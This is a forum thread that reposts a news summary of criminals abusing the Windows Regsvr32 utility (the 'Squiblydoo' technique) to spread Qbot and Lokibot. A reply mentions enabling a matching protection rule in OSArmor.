Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware

[upnorth]

Content source

https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/

A Windows living-off-the-land binary (LOLBin) known as Regsvr32 is seeing a big uptick in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.

LOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patters. In this case, Regsvr32 is a Microsoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs. This long reach is catnip to cyberattackers, who can abuse the utility via the “Squiblydoo” technique, Uptycs researchers warned. “Threat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,” they explained in a Wednesday writeup. “This method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.”

Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware

The living-off-the-land binary (LOLBin) is anchoring a rash of cyberattacks bent on evading security detection to drop Qbot and Lokibot.

threatpost.com

 

[plat]

Hmmm. May not trickle down to this lowly machine risk-wise but I enabled this rule in OSArmor anyway and will see how it goes. There's another regsvr32 rule but it seems to carry a greater risk of false-positives. This rule is otherwise disabled by default.